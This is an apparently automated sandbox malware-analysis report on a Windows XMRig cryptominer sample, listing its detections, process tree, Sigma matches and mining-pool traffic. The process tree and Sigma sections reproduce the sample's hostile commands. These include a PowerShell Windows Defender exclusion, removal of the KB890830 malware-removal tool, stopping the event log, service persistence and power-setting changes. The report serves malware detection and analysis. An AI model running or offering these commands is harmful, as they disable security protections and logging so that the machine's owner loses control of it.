
Windows Analysis Report
aA45th2ixY.exe

Overview

General Information

Sample name: aA45th2ixY.exe (renamed because original name is a hash value)
Original sample name: 40c59f3c50480cd8732770ef31a0116865f62c75501dc1afe3a3a9ff89f39d8e.exe
Analysis ID: 1527537
MD5: 6694e88cd0b76e774385e450b3027f35
SHA1: 5049c878bbbbfbeee9a38489086cb77a94c8f663
SHA256: 40c59f3c50480cd8732770ef31a0116865f62c75501dc1afe3a3a9ff89f39d8e
Tags: exe, user-Chainskilabs

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • aA45th2ixY.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\aA45th2ixY.exe" MD5: 6694E88CD0B76E774385E450B3027F35)
    • powershell.exe (PID: 7496 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7728 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7920 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 7736 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7752 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7768 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7796 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7812 cmdline: C:\Windows\system32\sc.exe delete "OAQXWXCL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7984 cmdline: C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8024 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8032 cmdline: C:\Windows\system32\sc.exe start "OAQXWXCL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • kgpcbqezuufy.exe (PID: 8104 cmdline: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe MD5: 6694E88CD0B76E774385E450B3027F35)
    • powershell.exe (PID: 8116 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4884 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3748 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 1456 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1148 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5020 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5444 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 3444 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author
00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

            Change of critical system settings

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7736, ProcessName: powercfg.exe

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7496, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto", ProcessId: 7984, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7496, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8024, ProcessName: sc.exe
            No Suricata rule has matched


            AV Detection

Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | ReversingLabs: Detection: 57%
Source: aA45th2ixY.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

            Bitcoin Miner

Source: Yara match | File source: 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3444, type: MEMORYSTR
Source: unknown | DNS query: name: xmr-eu1.nanopool.org
Source: aA45th2ixY.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmp

            Networking

Source: C:\Windows\explorer.exe | Network Connect: 51.15.58.224 10343
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 51.15.58.224:10343
Source: Joe Sandbox View | IP Address: 51.15.58.224
Source: Joe Sandbox View | ASN Name: OnlineSASFR
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: explorer.exe, 00000025.00000002.4209894132.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crle.s6$
Source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0

            System Summary

Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\aA45th2ixY.exe | Code function: 0_2_00007FF6E17D1394 NtOpenThreadTokenEx
Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Code function: 23_2_00007FF7B9E81394 NtQuerySecurityPolicy
Source: C:\Windows\System32\conhost.exe | Code function: 35_2_0000000140001394 NtDelayExecution
Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | File created: C:\Windows\TEMP\hnkcgwelkfzn.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_b1xyt0mh.cjq.ps1
Source: C:\Users\user\Desktop\aA45th2ixY.exe | Code function: 0_2_00007FF6E17D3B50
Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Code function: 23_2_00007FF7B9E83B50
Source: C:\Windows\System32\conhost.exe | Code function: 35_2_0000000140003150
Source: C:\Windows\System32\conhost.exe | Code function: 35_2_00000001400026E0
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\hnkcgwelkfzn.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: C:\Users\user\Desktop\aA45th2ixY.exe | Code function: String function: 00007FF6E17D1394 appears 33 times
Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Code function: String function: 00007FF7B9E81394 appears 33 times
Source: aA45th2ixY.exe | Static PE information: invalid certificate
Source: classification engine | Classification label: mal100.spyw.evad.mine.winEXE@58/12@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5572:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1748:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3068:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtezdwaf.ny4.ps1
Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Process created: C:\Windows\explorer.exe
Source: aA45th2ixY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: aA45th2ixY.exe | ReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | File read: C:\Users\user\Desktop\aA45th2ixY.exe
            Source: unknown | Process created: C:\Users\user\Desktop\aA45th2ixY.exe "C:\Users\user\Desktop\aA45th2ixY.exe"
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
